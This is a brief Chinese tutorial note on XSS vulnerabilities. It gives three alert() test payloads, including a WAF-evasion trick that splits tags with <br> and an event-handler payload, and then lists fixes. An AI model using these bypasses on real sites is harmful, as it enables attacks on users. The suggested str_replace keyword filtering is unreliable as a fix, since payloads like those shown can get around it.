一、XSS漏洞
1.过滤不严时直接提交script语句,如<script>alert(123)</script>
2.过滤稍严时用<br>标签绕过waf,如<scr<br>ipt>ale<br>rt(123)</sc<br>ript>
3.过滤严格时把结束标签的斜杠过滤了,即可用没结束标签的元素来构造xss,如<img src=1 οnclick='javascript:alert(123);'>
4.修复方案:
在输入时使用htmlspecialchars把预定义的字符转换为 HTML 实体。
或者用str_replace函数把关键字替换掉